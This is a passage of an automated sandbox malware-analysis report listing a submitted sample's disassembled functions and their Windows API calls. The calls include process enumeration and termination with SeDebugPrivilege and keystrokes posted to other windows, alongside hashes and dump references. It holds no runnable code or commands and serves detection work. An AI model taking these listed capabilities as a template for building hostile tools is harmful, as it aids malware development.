                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                                        • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                                                                                        • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                                        • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                                                                                        Function 00402B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                                                                                        • DestroyIcon.USER32(00000000), ref: 0043C37F
                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                                                                                        • DestroyIcon.USER32(?), ref: 0043C3AB
                                                                                          • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                        • String ID:
                                                                                        • API String ID: 2819616528-0
                                                                                        • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                                        • Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
                                                                                        • Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                                        • Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
                                                                                        Function 0045966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0045A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A84C
                                                                                          • Part of subcall function 0045A82C: GetCurrentThreadId.KERNEL32 ref: 0045A853
                                                                                          • Part of subcall function 0045A82C: AttachThreadInput.USER32(00000000,?,00459683,?,00000001), ref: 0045A85A
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0045968E
                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004596AB
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004596AE
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596B7
                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004596D5
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596D8
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596E1
                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004596F8
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2014098862-0
                                                                                        • Opcode ID: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                                                                        • Instruction ID: 1862abde6b5ba1d27f2b77b23e96e8fddf5d6721de8ccd0207d4cd72f070cce3
                                                                                        • Opcode Fuzzy Hash: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                                                                        • Instruction Fuzzy Hash: F011E571910618BEF6106F61DC49F6E3B1DDB4C755F100939F644AB0A1CAF25C15DBA8
                                                                                        Function 00458921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                                                                                        • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                                                                                        • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                                                                                        • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 1957940570-0
                                                                                        • Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                                        • Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
                                                                                        • Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                                        • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
                                                                                        Function 0047975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0045710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                                                          • Part of subcall function 0045710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                                                          • Part of subcall function 0045710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                                                          • Part of subcall function 0045710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00479806
                                                                                        • _memset.LIBCMT ref: 00479813
                                                                                        • _memset.LIBCMT ref: 00479956
                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00479982
                                                                                        • CoTaskMemFree.OLE32(?), ref: 0047998D
                                                                                        Strings
                                                                                        • NULL Pointer assignment, xrefs: 004799DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                        • String ID: NULL Pointer assignment
                                                                                        • API String ID: 1300414916-2785691316
                                                                                        • Opcode ID: dfb6947e6f265e4eeebdf8a304891f5c1fbd70c323f8dda92f53185c4893487f
                                                                                        • Instruction ID: 344d97a8cecc5579365d94fc52d7d4a9bdae2fe77cb17e56d270d326fab8ac0d
                                                                                        • Opcode Fuzzy Hash: dfb6947e6f265e4eeebdf8a304891f5c1fbd70c323f8dda92f53185c4893487f
                                                                                        • Instruction Fuzzy Hash: BD915CB1D00218EBDB10DFA5DC81EDEBBB9EF08314F10806AF519A7291EB755A44CFA5
                                                                                        Function 00486D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                                                                                        • _wcscat.LIBCMT ref: 00486EAD
                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                        • String ID: SysListView32
                                                                                        • API String ID: 307300125-78025650
                                                                                        • Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                                        • Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
                                                                                        • Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                                        • Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
                                                                                        Function 0047E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                                                                                          • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                                                                                          • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                                                                                        • GetLastError.KERNEL32 ref: 0047E9B7
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                                                                                        • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                        • String ID: SeDebugPrivilege
                                                                                        • API String ID: 2533919879-2896544425
                                                                                        • Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                                        • Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
                                                                                        • Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                                        • Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
                                                                                        Function 00462F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoad
                                                                                        • String ID: blank$info$question$stop$warning
                                                                                        • API String ID: 2457776203-404129466
                                                                                        • Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                                        • Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
                                                                                        • Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                                        • Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
                                                                                        Function 004642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                                                                                        • LoadStringW.USER32(00000000), ref: 00464319
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                                                                                        • LoadStringW.USER32(00000000), ref: 00464336
                                                                                        • _wprintf.LIBCMT ref: 0046435C
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                                                                                        Strings
                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                        • API String ID: 3648134473-3128320259
                                                                                        • Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                                        • Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
                                                                                        • Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                                        • Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
                                                                                        Function 0048D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                                                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                        • String ID:
                                                                                        • API String ID: 1211466189-0
                                                                                        • Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                                                        • Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
                                                                                        • Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                                                        • Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54
                                                                                        Function 00402A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1268545403-0
                                                                                        • Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                                                        • Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
                                                                                        • Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                                                        • Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D
                                                                                        Function 004670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                                                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00467130
                                                                                        • _memmove.LIBCMT ref: 0046717E
                                                                                        • _memmove.LIBCMT ref: 0046719B
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
